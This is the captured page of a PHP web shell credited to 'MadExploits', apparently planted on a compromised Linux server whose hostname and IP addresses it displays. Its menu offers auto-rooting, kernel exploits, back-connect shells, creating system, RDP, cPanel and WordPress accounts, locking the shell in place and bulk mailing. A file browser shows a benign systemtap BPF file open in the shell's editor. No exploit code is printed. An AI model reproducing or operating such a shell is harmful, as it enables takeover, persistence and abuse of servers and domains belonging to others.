Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.156
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
tapset /
bpf /
[ HOME SHELL ]
Name
Size
Permission
Action
context.stp
4.82
KB
-rw-r--r--
conversions.stp
4.14
KB
-rw-r--r--
exit.stp
639
B
-rw-r--r--
syscalls.stpm
213
B
-rw-r--r--
task.stp
583
B
-rw-r--r--
time.stp
539
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : exit.stp
/** * function exit - * * Description: Set exit flag. */ function _set_exit_status:long () %{ /* bpf */ /* unprivileged */ 0x118, 1, 0, 0, 0; /* BPF_LD_MAP_FD(r1, map0) */ 0x7a, 10, 0, -8, 1; /* *(u64 *)(r10 - 8) = 1 (map value) */ 0xbf, 3, 10, 0, 0; /* r3 = r10 */ 0x07, 3, 0, 0, -8; /* r3 += -8 */ 0x62, 10, 0, -12, 0; /* *(u32 *)(r10 - 12) = 0 (map key) */ 0xbf, 2, 10, 0, 0; /* r2 = r10 */ 0x07, 2, 0, 0, -12; /* r2 += -12 */ 0xb7, 4, 0, 0, 0; /* r4 = 0 (flags) */ 0x85, 0, 0, 0, 2; /* call bpf_map_update_elem */ 0xbf, $$, 0, 0, 0 /* return r0 */ %}
Close